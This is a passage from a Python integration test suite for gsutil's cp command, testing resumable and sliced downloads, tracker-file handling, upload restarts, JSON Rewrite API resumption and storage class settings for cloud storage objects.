'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath2)
],
return_stderr=True,
expected_status=1)
self.assertIn('Artifically halting download.', stderr)
self.assertIn('Downloading to temp gzip filename', stderr)
# Tracker files will have different names depending on if we are
# downloading sequentially or in parallel.
sliced_download_threshold = HumanReadableToBytes(
boto.config.get('GSUtil', 'sliced_object_download_threshold',
DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD))
sliced_download = (len(contents) > sliced_download_threshold and
sliced_download_threshold > 0 and
UsingCrcmodExtension())
if sliced_download:
trackerfile_type = TrackerFileType.SLICED_DOWNLOAD
else:
trackerfile_type = TrackerFileType.DOWNLOAD
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath2),
trackerfile_type, self.test_api)
# We should have a temporary gzipped file, a tracker file, and no
# final file yet.
self.assertTrue(os.path.isfile(tracker_filename))
self.assertTrue(os.path.isfile('%s_.gztmp' % fpath2))
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath2)], return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
self.assertFalse(os.path.isfile(tracker_filename))
self.assertFalse(os.path.isfile('%s_.gztmp' % fpath2))
def _GetFaviconFile(self):
# Make a temp file from favicon.ico.gz. The location of our test data
# varies depending on how/where gsutil was installed, so we get the data
# via pkgutil as a workaround.
if not hasattr(self, 'test_data_favicon_file'):
contents = pkgutil.get_data('gslib', 'tests/test_data/favicon.ico.gz')
self.test_data_favicon_file = self.CreateTempFile(contents=contents)
return self.test_data_favicon_file
def test_cp_download_transfer_encoded(self):
"""Tests chunked transfer encoded download handling.
Tests that download works correctly with a gzipped chunked transfer-encoded
object (which therefore lacks Content-Length) of a size that gets fetched
in a single chunk (exercising downloading of objects lacking a length
response header).
"""
# Upload a file / content-encoding / content-type that triggers this flow.
# Note: We need to use the file with pre-zipped format and manually set the
# content-encoding and content-type because the Python gzip module (used by
# gsutil cp -Z) won't reproduce the bytes that trigger this problem.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, object_name='foo')
input_filename = self._GetFaviconFile()
self.RunGsUtil([
'-h', 'Content-Encoding:gzip', '-h', 'Content-Type:image/x-icon', 'cp',
suri(input_filename),
suri(object_uri)
])
# Compute the MD5 of the uncompressed bytes.
with gzip.open(input_filename) as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
in_file_md5 = hash_dict['md5'].digest()
# Downloading this file triggers the flow.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
# Compute MD5 of the downloaded (uncompressed) file, and validate it.
with open(fpath2, 'rb') as fp:
hash_dict = {'md5': GetMd5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
out_file_md5 = hash_dict['md5'].digest()
self.assertEqual(in_file_md5, out_file_md5)
@SequentialAndParallelTransfer
def test_cp_resumable_download_check_hashes_never(self):
"""Tests that resumble downloads work with check_hashes = never."""
bucket_uri = self.CreateBucket()
contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'check_hashes', 'never')]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Found no hashes to validate object downloaded', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_bucket_deleted(self):
"""Tests that a not found exception is raised if bucket no longer exists."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * 2 * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_DeleteBucketThenStartOverCopyCallbackHandler(5, bucket_uri)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True,
expected_status=1)
self.assertIn('Deleting bucket', stderr)
self.assertIn('bucket does not exist', stderr)
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download(self):
"""Tests that sliced object download works in the general case."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * ONE_KIB)
fpath = self.CreateTempFile()
# Force fast crcmod to return True to test the basic sliced download
# scenario, ensuring that if the user installs crcmod, it will work.
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'test_assume_fast_crcmod', 'True'),
('GSUtil', 'sliced_object_download_threshold', str(ONE_KIB)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), fpath])
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * ONE_KIB, 'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_unresumable_sliced_download(self):
"""Tests sliced download works when resumability is disabled."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# No tracker files should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Perform the entire download, without resuming.
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume(self):
"""Tests that sliced object download is resumable."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_partial_resume(self):
"""Test sliced download resumability when some components are finished."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltOneComponentCopyCallbackHandler(5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Download already complete', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume_content_differs(self):
"""Tests differing file contents are detected by sliced downloads."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile(contents=b'')
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
with open(fpath + '_.gstmp', 'r+b') as f:
f.write(b'altered file contents')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Resuming download', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
self.assertIn('HashMismatchException: crc32c', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Temporary file should have been deleted due to hash mismatch.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Final file should not exist.
self.assertFalse(os.path.isfile(fpath))
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_component_size_changed(self):
"""Tests sliced download doesn't break when the boto config changes.
If the number of components used changes cross-process, the download should
be restarted.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 4)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 2)),
('GSUtil', 'sliced_object_download_max_components', '2')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Sliced download tracker file doesn\'t match ', stderr)
self.assertIn('Restarting download from scratch', stderr)
self.assertNotIn('Resuming download', stderr)
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_disabled_cross_process(self):
"""Tests temporary files are not orphaned if sliced download is disabled.
Specifically, temporary files should be deleted when the corresponding
non-sliced download is completed.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
# Disable sliced downloads by increasing the threshold
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should have been deleted.
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_start_over_http_error(self):
for start_over_error in (
403, # If user doesn't have storage.buckets.get access to dest bucket.
404, # If the dest bucket exists, but the dest object does not.
410): # If the service tells us to restart the upload from scratch.
self.start_over_error_test_helper(start_over_error)
def start_over_error_test_helper(self, http_error_num):
bucket_uri = self.CreateBucket()
# The object contents need to be fairly large to avoid the race condition
# where the contents finish uploading before we artificially halt the copy.
rand_chars = get_random_ascii_chars(size=(ONE_MIB * 4))
fpath = self.CreateTempFile(contents=rand_chars)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
if self.test_api == ApiSelector.JSON:
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(_JSONForceHTTPErrorCopyCallbackHandler(5, http_error_num)))
elif self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_XMLResumableUploadStartOverCopyCallbackHandler(5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True)
self.assertIn('Restarting upload of', stderr)
def test_cp_minus_c(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.RunGsUtil([
'cp', '-c',
suri(bucket_uri) + '/foo2',
suri(object_uri),
suri(bucket_uri) + '/dir/'
],
expected_status=1)
self.RunGsUtil(['stat', '%s/dir/foo' % suri(bucket_uri)], force_gsutil=True)
def test_rewrite_cp(self):
"""Tests the JSON Rewrite API."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar')
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type)
dst_obj_metadata = apitools_messages.Object(
bucket=src_obj_metadata.bucket,
name=self.MakeTempName('object'),
contentType=src_obj_metadata.contentType)
gsutil_api.CopyObject(src_obj_metadata, dst_obj_metadata)
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
def test_rewrite_cp_resume(self):
"""Tests the JSON Rewrite API, breaking and resuming via a tracker file."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file should be left over.
self.assertTrue(os.path.exists(tracker_file_name))
# Now resume. Callback ensures we didn't start over.
gsutil_api.CopyObject(
src_obj_metadata,
dst_obj_metadata,
progress_callback=EnsureRewriteResumeCallbackHandler(ONE_MIB *
2).call,
max_bytes_per_call=ONE_MIB)
# Copy completed; tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_source_changed(self):
"""Tests that Rewrite starts over when the source object has changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Overwrite the original object.
object_uri2 = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar',
prefer_json_api=True)
key2 = object_uri2.get_key()
src_obj_metadata2 = apitools_messages.Object(
name=key2.name,
bucket=key2.bucket.name,
contentType=key2.content_type,
etag=key2.etag.strip('"\''))
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the new object.
gsutil_api.CopyObject(src_obj_metadata2,
dst_obj_metadata,
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata2.bucket,
src_obj_metadata2.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_command_changed(self):
"""Tests that Rewrite starts over when the arguments changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='private',
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the same object but with different call parameters.
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='public-read',
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
new_obj_metadata = gsutil_api.GetObjectMetadata(
dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['acl', 'customerEncryption', 'md5Hash'])
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
new_obj_metadata.md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
# New object should have a public-read ACL from the second command.
found_public_acl = False
for acl_entry in new_obj_metadata.acl:
if acl_entry.entity == 'allUsers':
found_public_acl = True
self.assertTrue(found_public_acl,
'New object was not written with a public ACL.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@unittest.skipUnless(UsingCrcmodExtension(), 'Test requires fast crcmod.')
def test_cp_preserve_posix_bucket_to_dir_no_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically tests combinations of POSIX attributes in metadata that will
pass validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
TestCpMvPOSIXBucketToLocalNoErrors(self, bucket_uri, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_bucket_to_dir_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically, combinations of POSIX attributes in metadata that will fail
validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
obj = self.CreateObject(bucket_uri=bucket_uri,
object_name='obj',
contents=b'obj')
TestCpMvPOSIXBucketToLocalErrors(self, bucket_uri, obj, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_dir_to_bucket_no_errors(self):
"""Tests use of the -P flag with cp from a local dir to a bucket."""
bucket_uri = self.CreateBucket()
TestCpMvPOSIXLocalToBucketNoErrors(self, bucket_uri, is_cp=True)
def test_cp_minus_s_to_non_cloud_dest_fails(self):
"""Test that cp -s operations to a non-cloud destination are prevented."""
local_file = self.CreateTempFile(contents=b'foo')
dest_dir = self.CreateTempDir()
stderr = self.RunGsUtil(['cp', '-s', 'standard', local_file, dest_dir],
expected_status=1,
return_stderr=True)
self.assertIn('Cannot specify storage class for a non-cloud destination:',
stderr)
# TODO: Remove @skip annotation from this test once we upgrade to the Boto
# version that parses the storage class header for HEAD Object responses.
@SkipForXML('Need Boto version > 2.46.1')
def test_cp_specify_nondefault_storage_class(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
object2_suri = suri(object_uri) + 'bar'
# Specify storage class name as mixed case here to ensure that it
# gets normalized to uppercase (S3 would return an error otherwise), and
# that using the normalized case is accepted by each API.
nondefault_storage_class = {
's3': 'Standard_iA',
'gs': 'durable_REDUCED_availability'
}
storage_class = nondefault_storage_class[self.default_provider]
self.RunGsUtil(['cp', '-s', storage_class, suri(object_uri), object2_suri])
stdout = self.RunGsUtil(['stat', object2_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+%s' % storage_class,
flags=re.IGNORECASE)
@SkipForS3('Test uses gs-specific storage classes.')
def test_cp_sets_correct_dest_storage_class(self):
"""Tests that object storage class is set correctly with and without -s."""
# Use a non-default storage class as the default for the bucket.
bucket_uri = self.CreateBucket(storage_class='nearline')
# Ensure storage class is set correctly for a local-to-cloud copy.
local_fname = 'foo-orig'
local_fpath = self.CreateTempFile(contents=b'foo', file_name=local_fname)
foo_cloud_suri = suri(bucket_uri) + '/' + local_fname
self.RunGsUtil(['cp', '-s', 'standard', local_fpath, foo_cloud_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_cloud_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when no
# destination storage class is specified.
foo_nl_suri = suri(bucket_uri) + '/foo-nl'
self.RunGsUtil(['cp', foo_cloud_suri, foo_nl_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_nl_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+NEARLINE',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when a
# non-bucket-default storage class is specified.
foo_std_suri = suri(bucket_uri) + '/foo-std'
